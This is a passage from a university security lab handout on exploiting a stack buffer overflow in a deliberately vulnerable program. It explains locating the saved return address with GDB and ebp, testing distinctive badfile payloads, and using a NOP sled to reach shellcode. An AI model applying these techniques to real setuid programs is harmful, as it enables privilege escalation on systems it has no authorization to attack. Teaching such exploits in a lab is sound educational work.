find out where the saved return address and what the frame “base”
address is (the ebp
register). But you can no longer run
(for example) info locals
, since information about the C
variable names and their types has been lost.
But, knowing that when variable names are lost, and that the assembly
code uses “offsets from the ebp
register” instead of
variables, you might guess that just before the call to
strcpy
, the assembly code must include the offset to
buffer
. And indeed this is the case: the assembly preserves
a pretty readable call to strcpy
(“call 0x56556130 <strcpy@plt>
”), and a few
instructions beforehand is the exact offset from ebp
to
buffer
.
(If the executable has been stripped using the strip
program, though, then even the name of functions like
bof
get removed, and it’s no longer possible to run
break bof
. It is possible to work with GDB on
stripped binaries, but can be a bit of a pain – a blogger on medium.com
gives some tips in this post, “Working
With Stripped Binaries in GDB”. Fortunately, in this lab we are
working only with unstripped binaries.)
It can be discovered through research (though we didn’t cover it
in class) that there are GCC-specific features that allows us to print
off the contents of the ebp
register.
The following code will do so:
register size_t my_ebp_var asm("ebp");
printf("ebp: %zx\n", my_ebp_var);
We can insert that code into a copy of stack-L1
and
compile it. Since we know the “saved eip
” location is
$ebp + 4
, we know now what location we have to overwrite in
order to jump to our shellcode.
Some additional hints:
It can be useful to experiment with a badfile
where
the contents are very distinctive, and easy to spot in GDB’s output.
For instance, a badfile that starts with the letters
“ABCDEFGHIJKLMNOPQRSTUVWXYZ
”, say.
Likewise, before trying the exploit with real shellcode, you could
try using a sequence like
"\0x10\0x11\0x12\0x13\0x14\0x15\0x16\0x17\0x1a"
) so it’s
easy to spot where in the buffer
variable it’s
located.
To print out the contents of a string in memory, you can use the
GDB command x/s some_ptr
.
(For other formats you can use, see the GDB “x command” reference.)
The x86 assembly instruction “NOP
” (“No Operation”,
code 0x90
) does nothing – it’s like a semicolon in C, or
the “pass
” statement in Python. So if you put your
shellcode sequence towards the end of badfile
, it
won’t matter if the location you jump to is a bit ahead of the shellcode
– the NOP
instructions will just get executed til the start
of the shellcode.
The objdump
program can be used to
disassemble the stack-L1
and
stack-L1-dbg
binaries.
For the -dbg
version of the vulnerable program, we can
see the assembler code intermingled with C source code by running:
$ objdump --line-numbers -d --source ./stack-L1-dbg
If you’re at all familiar with assembly code, the bof
function is very small and simple and isn’t too hard to follow.
The code for the programs in this lab is adapted from the Set-UID lab at https://web.ecs.syr.edu/~wedu/seed/Labs/Set-UID/Set-UID.pdf and is copyright Wenliang Du, Syracuse University.
Also called assembly, assembler language, assembler or symbolic machine code.↩︎
A small, named memory cell used by the processor. See “Registers and the stack”.↩︎
You can replicate this by saving the assembly code as a
file sploit.s
, and inserting the lines:
section .text
global _start
_start:
at the start. Compile it with the command
nasm -f elf32 sploit.s -o sploit.o
, then issue the
command objdump -d sploit.o
to see the disassembled
shellcode.↩︎
The man page for proc explains the format of
the listing – search within the man page for the text
“/proc/[pid]/maps
” to locate the relevant documentation.
Most of the
permissions (“r”, “w” and “x”) should be self-explanatory. For our
purposes, you don’t need to know that the “p” means. (But if you’re
interested – it indicates a copy-on-write
memory segment.)↩︎
A little math tells us that (location_in_main
− start_of_main) = (0x56556382−0x565562e0)
= 162; we’re 162 instructions past the start of the main
function. If we wanted, we could view the precise assembly language
instructions being executed, by issuing the GDB command
layout asm
.↩︎
Technically, it would be more appropriate to treat
$saved_eip
as a “pointer to intptr_t
” or as a
“pointer to a function pointer” – but “size_t
” is much
easier to read.↩︎